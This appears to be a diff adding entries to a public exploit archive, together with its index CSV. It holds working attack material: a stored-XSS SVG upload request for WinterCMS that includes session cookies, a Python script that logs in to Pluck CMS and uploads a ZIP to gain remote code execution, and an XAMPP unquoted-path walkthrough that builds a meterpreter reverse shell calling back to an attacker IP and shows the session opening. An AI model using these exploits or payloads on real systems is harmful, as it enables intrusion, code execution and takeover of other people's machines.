+//Post Request
+
+POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
+Host: 172.17.0.2
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: application/json
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cache-Control: no-cache
+X-Requested-With: XMLHttpRequest
+X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
+X-WINTER-REQUEST-HANDLER: formLogo::onUpload
+Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
+Content-Length: 608
+Origin: http://172.17.0.2
+Connection: close
+Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D
+
+-----------------------------186411693022341939203410401206
+Content-Disposition: form-data; name="file_data"; filename="image.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.domain);
+   </script>
+</svg>
+
+-----------------------------186411693022341939203410401206--
+
+
+
+|-----------------------------------------EOF-----------------------------------------

exploits/php/webapps/51592.py

@@ -0,0 +1,57 @@
+#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
+#Application: pluck
+#Version: 4.7.18
+#Bugs:  RCE
+#Technology: PHP
+#Vendor URL: https://github.com/pluck-cms/pluck
+#Software Link: https://github.com/pluck-cms/pluck
+#Date of found: 10-07-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+login_url = "http://localhost/pluck/login.php"
+upload_url = "http://localhost/pluck/admin.php?action=installmodule"
+headers = {"Referer": login_url,}
+login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}
+
+file_path = input("ZIP file path: ")
+
+multipart_data = MultipartEncoder(
+    fields={
+        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
+        "submit": "Upload"
+    }
+)
+
+session = requests.Session()
+login_response = session.post(login_url, headers=headers, data=login_payload)
+
+
+if login_response.status_code == 200:
+    print("Login account")
+
+
+    upload_headers = {
+        "Referer": upload_url,
+        "Content-Type": multipart_data.content_type
+    }
+    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)
+
+
+    if upload_response.status_code == 200:
+        print("ZIP file download.")
+    else:
+        print("ZIP file download error. Response code:", upload_response.status_code)
+else:
+    print("Login problem. response code:", login_response.status_code)
+
+
+rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"
+
+rce=requests.get(rce_url)
+
+print(rce.text)

exploits/windows/local/51585.txt

@@ -0,0 +1,59 @@
+# Exploit Title: XAMPP 8.2.4 - Unquoted Path
+# Date: 07/2023
+# Exploit Author: Andrey Stoykov
+# Version: 8.2.4
+# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
+# Tested on: Windows Server 2022
+# Blog: http://msecureltd.blogspot.com/
+
+
+Steps to Exploit:
+
+1. Search for unquoted paths
+2. Generate meterpreter shell
+3. Copy shell to XAMPP directory replacing "mysql.exe"
+4. Exploit by double clicking on shell
+
+
+C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+
+mysql                                                                               mysql                                     C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql            Auto
+
+
+
+// Generate shell
+msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe
+
+
+// Setup listener
+msf6 > use exploit/multi/handler
+msf6 exploit(multi/handler) > set lhost 192.168.1.13
+msf6 exploit(multi/handler) > set lport 4443
+msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
+msf6 exploit(multi/handler) > run
+
+
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4443
+[*] Sending stage (175686 bytes) to 192.168.1.11
+[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700
+
+
+meterpreter > getuid
+Server username: WIN-5PT4K404NLO\astoykov
+meterpreter > getpid
+Current pid: 4724
+meterpreter > shell
+Process 5884 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.20348.1]
+(c) Microsoft Corporation. All rights reserved.
+[...]
+C:\xampp\mysql\bin>dir
+dir
+ Volume in drive C has no label.
+ Volume Serial Number is 80B5-B405
+
+ Directory of C:\xampp\mysql\bin
+[...]

files_exploits.csv

@@ -4141,6 +4141,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,,2019-07-15,2019-07-15,0,CVE-2019-1943,,,,,
 17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",webapps,hardware,,2011-09-19,2011-09-19,0,CVE-2011-2577;OSVDB-75663;CVE-2011-2544;CVE-2011-2543;OSVDB-75662;OSVDB-74901,,,,,http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf
 49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,,2021-01-18,2021-01-18,0,,,,,,
+51589,exploits/hardware/webapps/51589.txt,"Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass",2023-07-15,"Fatih Sencer",webapps,hardware,,2023-07-15,2023-07-15,0,CVE-2019-1937,,,,,
 40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware,,2016-12-07,2016-12-07,0,CVE-2013-5528,,,,,
 47153,exploits/hardware/webapps/47153.txt,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,,2019-07-24,2020-01-09,0,CVE-2019-12624,"Cross-Site Request Forgery (CSRF)",,,,
 49038,exploits/hardware/webapps/49038.rb,"Citrix ADC NetScaler - Local File Inclusion (Metasploit)",2020-11-13,"RAMELLA Sebastien",webapps,hardware,,2020-11-13,2020-11-13,0,,,,,,
@@ -5527,7 +5528,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java,,2008-11-09,2014-03-29,1,OSVDB-49752;OSVDB-105626,,,,,https://www.securityfocus.com/bid/32208/info
 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,,2012-12-13,2017-05-12,1,,,,,,https://www.securityfocus.com/bid/56933/info
 51205,exploits/java/webapps/51205.py,"Nacos 2.0.3 - Access Control vulnerability",2023-04-03,"Jenson Zhao",webapps,java,,2023-04-03,2023-04-03,0,CVE-2021-43116,,,,,
-51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-11,0,,,,,,
+51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-15,1,,,,,,
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,,2021-03-29,2021-03-29,0,,,,,,
 26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java,,2005-07-15,2013-06-07,1,CVE-2005-2276;OSVDB-18064,,,,,https://www.securityfocus.com/bid/14310/info
 32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,,2009-04-15,2019-03-28,1,CVE-2009-1294;OSVDB-53937,,,,,https://www.securityfocus.com/bid/34531/info
@@ -13460,6 +13461,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21005,exploits/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",webapps,php,,2012-09-02,2016-11-28,1,CVE-2012-4749;CVE-2012-4748;OSVDB-85146;OSVDB-85145,,,,http://www.exploit-db.comadmidio-2.3.5.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt
 42005,exploits/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",webapps,php,,2017-05-15,2017-05-15,1,CVE-2017-8382,,,,http://www.exploit-db.comadmidio-3.2.8.zip,
 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80,2018-09-03,2018-09-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadmidio-3.3.5.zip,
+51590,exploits/php/webapps/51590.txt,"Admidio v4.2.10 - Remote Code Execution (RCE)",2023-07-15,"Mirabbas Ağalarov",webapps,php,,2023-07-15,2023-07-15,0,,,,,,
 51402,exploits/php/webapps/51402.txt,"admidio v4.2.5 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 36290,exploits/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,webapps,php,,2011-11-07,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50562/info
 9161,exploits/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-56235;CVE-2009-2558,,,,,
@@ -15128,8 +15130,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-07-04,1,,,,,,
 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2023-07-07,1,,,,,,
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2023-07-07,1,,,,,,
-50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
-50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
+50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2023-07-15,1,,,,,,
+50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2023-07-15,1,,,,,,
 51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,,
 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,,
 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
@@ -19692,6 +19694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
 42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
 51329,exploits/php/webapps/51329.py,"Icinga Web 2.10 - Arbitrary File Disclosure",2023-04-08,"Jacob Ebben",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-24716,,,,,
+51586,exploits/php/webapps/51586.py,"Icinga Web 2.10 - Authenticated Remote Code Execution",2023-07-15,"Dante Corona",webapps,php,,2023-07-15,2023-07-15,0,CVE-2022-24715,,,,,
 42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
 35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php,,2011-03-30,2014-12-16,1,CVE-2011-1557;OSVDB-73408,,,,,https://www.securityfocus.com/bid/47100/info
 42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
@@ -24276,6 +24279,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2325,exploits/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,webapps,php,,2006-09-06,,1,OSVDB-30790;CVE-2006-4678;OSVDB-30789,,,,,
 26818,exploits/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4262;OSVDB-21751,,,,,https://www.securityfocus.com/bid/15857/info
 26819,exploits/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4263;OSVDB-21752,,,,,https://www.securityfocus.com/bid/15857/info
+51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-07-15,0,,,,,,
 19180,exploits/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,,2012-06-16,2012-06-17,1,OSVDB-82995;OSVDB-82994;OSVDB-82993;OSVDB-82992,,,,,https://www.vulnerability-lab.com/get_content.php?id=600
 15843,exploits/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,webapps,php,,2010-12-29,2010-12-29,0,,,,,,
 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,,
@@ -27735,6 +27739,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",2022-03-16,"Ashish Koli",webapps,php,,2022-03-16,2022-03-16,0,CVE-2022-26965,,,,,
 40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",webapps,php,,2016-10-18,2016-10-18,0,,,,,http://www.exploit-db.compluck-4.7.3.zip,
 38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,webapps,php,80,2015-08-28,2015-08-28,0,OSVDB-126897;OSVDB-126896;OSVDB-126895;OSVDB-126894;OSVDB-126893,,,,http://www.exploit-db.compluck-4.7.3.tar.gz,
+51592,exploits/php/webapps/51592.py,"Pluck v4.7.18 - Remote Code Execution (RCE)",2023-07-15,"Mirabbas Ağalarov",webapps,php,,2023-07-15,2023-07-15,0,,,,,,
 51420,exploits/php/webapps/51420.txt,"pluck v4.7.18 - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",webapps,php,,2004-08-07,2013-01-24,1,OSVDB-8349,,,,,https://www.securityfocus.com/bid/10885/info
 35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46962/info
@@ -28154,6 +28159,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,,
 49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,,
 51387,exploits/php/webapps/51387.txt,"ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
+51588,exploits/php/webapps/51588.txt,"ProjeQtOr Project Management System v10.4.1 - Multiple XSS",2023-07-15,"Mirabbas Ağalarov",webapps,php,,2023-07-15,2023-07-15,0,,,,,,
 45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip,
 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,,
 11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip,
@@ -32352,6 +32358,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3622,exploits/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User",2007-04-01,rgod,webapps,php,,2007-03-31,2016-09-29,1,OSVDB-34677;CVE-2005-3811,,,,,
 10653,exploits/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61350;CVE-2009-4678,,,,,
 18290,exploits/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,webapps,php,,2011-12-29,2011-12-29,1,CVE-2011-5026;OSVDB-78070,,,,http://www.exploit-db.comwinn_guestbook_v2.4.8c.zip,
+51591,exploits/php/webapps/51591.txt,"WinterCMS < 1.2.3 - Persistent Cross-Site Scripting",2023-07-15,"abhishek morla",webapps,php,,2023-07-15,2023-07-15,0,CVE-2023-37269,,,,,
 39332,exploits/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-27,1,OSVDB-107116,,,,,https://www.securityfocus.com/bid/67481/info
 3686,exploits/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,webapps,php,,2007-04-07,2016-09-30,1,OSVDB-34735;CVE-2007-1928,,,,http://www.exploit-db.comwitshare-0.9.zip,
 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,80,2018-05-28,2018-08-02,0,CVE-2018-11512,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comwityCMS-0.6.1.tar.gz,
@@ -41696,6 +41703,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows,,2019-03-25,2019-03-25,0,,Local,,,http://www.exploit-db.comxns56p_setup.exe,
 46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows,,2019-03-25,2019-03-25,0,,"Buffer Overflow",,,http://www.exploit-db.comxns56p_setup.exe,
 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",2021-09-27,"Salman Asad",local,windows,,2021-09-27,2022-08-01,0,CVE-2020-11107,,,,,
+51585,exploits/windows/local/51585.txt,"XAMPP 8.2.4 - Unquoted Path",2023-07-15,"Andrey Stoykov",local,windows,,2023-07-15,2023-07-15,0,,,,,,
 45828,exploits/windows/local/45828.py,"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)",2018-11-13,"Semen Alexandrovich Lyhin",local,windows,,2018-11-13,2018-11-13,0,,Local,,,http://www.exploit-db.comxampp-win32-5.6.38-0-VC11-installer.exe,
 4325,exploits/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Local Privilege Escalation",2007-08-27,Inphex,local,windows,,2007-08-26,2010-09-24,1,,,,,http://www.exploit-db.comxampp-win32-1.6.3a-installer.exe,
 10371,exploits/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,local,windows,,2009-12-09,,1,OSVDB-57162,,,,http://www.exploit-db.comXenorate_62542.exe,